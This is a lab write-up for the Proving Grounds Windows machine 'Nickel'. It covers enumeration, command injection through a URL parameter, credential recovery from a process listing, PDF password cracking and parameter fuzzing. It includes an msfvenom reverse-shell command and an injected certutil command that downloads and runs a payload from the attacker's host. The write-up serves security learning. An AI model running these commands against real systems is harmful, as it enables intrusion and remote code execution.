Nickel

Source: Proving Grounds OS: Windows Community Rating: Hard

Enumeration & Reconnaissance

• I started with autorecon as usual and found these ports open: FTP (21), SSH (22), HTTP (80), 135, 139, 445, 3389, 5040, 7680, 8089, HTTP (33333), 49664 -> 49669

Service Analysis

• FTP didn’t allow anonymous connections so I skipped that and started with HTTP. Upon opening HTTP (80), I saw a blank page displaying: "dev-api started at 2024-08-02T13:35:17"

HTTP (80)

• That was promising, maybe I need to fuzz for an endpoint. I checked the fuzzers but nothing came out. I looked at robots.txt and got the message: "Incorrect Parameter"

Incorrect Parameter

• Interesting. I recalled a technique from HTB about Parameter Fuzzing. But I didn’t even need to go that far; I simply added a "?aaa" parameter with random text and got an error: Error while executing 'aaa'

• Curious, I tried an actual command: appending "?whoami" returned that I was "nt authority\system".

SYSTEM

• I uploaded a reverse shell and got a connection as SYSTEM, literally that easy!

msfvenom -p windows/x64/shell_reverse_tcp -f exe -o shell.exe LHOST=192.168.45.170 LPORT=8178 # Generate the shell

http://192.168.213.99/?certutil%20-urlcache%20-split%20-f%20http%3A%2F%2F192.168.45.170%3A901%2Fshell.exe # Upload the Shell

http://192.168.213.99/?.%5Cshell.exe # Execute the Shell

Reverse Shell

• I was shocked because this machine is rated as Intermediate by OffSec and Hard by the community. I thought it might be bugged, so I reverted the machine and tried again but same result. I checked writeups and they had a different approach, so I started again and planned to report it as a bug to OffSec once I was done.

• Port 33333 was promising as well. It had three endpoints:

  • list-current-deployments

  • list-running-procs

  • list-active-nodes

DevOps Dashboard

• I tried running them but the IP address and port number were hardcoded in the HTML:

Hardcoded Endpoints

• I then retried using the machine’s IP address. Now we were getting somewhere, the response I got: Cannot "GET" /list-current-deployments

Gaining Initial Access

• I suspected that we need to try another HTTP method. I started Burp and changed the HTTP Method to POST.

Not Implemented

• The first API returned "Not Implemented", but the second API returned a list of processes. One process included a command line that revealed a password for the user:

/name : cmd.exe
commandline : cmd.exe C:\windows\system32\DevTasks.exe --deploy C:\work\dev.yaml --user ariah -p "Tm93aXNlU2xvb3BUaGVvcnkxMzkK" --server nickel-dev --protocol ssh

Credentials Leak

• Bingo, this was our breakthrough. I tried the password on SSH, but it didn’t work. It was too long for a password; perhaps it was encrypted or hashed, I thought. I opened CyberChef and ran the Magic function. It indeed was encoded in Base64. The actual password turned out to be: NowiseSloopTheory139

Password Decoded

Privilege Escalation

• Using the password found, I logged into SSH. Once in, I uploaded WinPEAS right away. I also checked FTP using the same credentials while WinPEAS was running. There, I found a file named Infrastructure.pdf.

PDF File

• The PDF was protected with a password. Initially, I set it aside as a potential rabbit hole, and I checked WinPEAS for any other privilege escalation vectors, but nothing else stood out. I came back to the FTP share and decided to give the PDF a shot. I used pdf2john to format it for John the Ripper and cracked the password:

pdf2john Infrastructure.pdf > hash
john --wordlist=/usr/share/wordlists/rockyou.txt hash

PDF Password Cracked

• It found the password: ariah4168. I opened the PDF, and it referenced the initial parameter that I had exposed. It turns out this is the privilege escalation vector, not a bug, but it was supposed to be discovered after initial access and cracking the PDF password. I was just maybe lucky to discover it at the beginning.

PDF File Content

• If the "?aaa" trick hadn’t worked at the beginning, I would have approached it more systematically by using ffuf to fuzz parameters and eventually find it. For example:

ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u http://192.168.213.99?FUZZ=key

• This would expose multiple false positives (all responses would be 200). Then, by filtering the results, say, by using the word count since all normal responses returned 46 words—you could run:

ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u http://192.168.213.99?FUZZ=key -fw 46

• This would expose fewer results; for example, one such result might be: http://192.168.213.99/?23=key Which returns:

"dev-api started at 2024-08-02T13:35:17 Error while executing '23=key'
At line:1 char:1
  + 23=key
  + ~~
The assignment expression is not valid. The input to an assignment operator must be an object that is able to accept assignments, such as a variable or a property."

• That systematic approach would have helped identify the parameter if I hadn’t been so lucky with "?aaa".

Fuzzing using ffuf

Lessons Learned

• Parameter fuzzing can be extremely effective; even a simple test like adding "?aaa" may expose vulnerabilities without a full-scale fuzzer.

• If simple tests work, having a systematic approach, by fuzzing, is a good backup plan.

• Always check API endpoints when available; hardcoded IPs might need to be replaced with the target’s IP.

• Converting encoded strings (using tools like CyberChef) is crucial to reveal hidden credentials.

• Even when an obvious vector (like FTP or HTTP) yields no results, combining information from multiple services (HTTP parameter fuzzing, process listings, and file password cracking) can reveal the path to privilege escalation.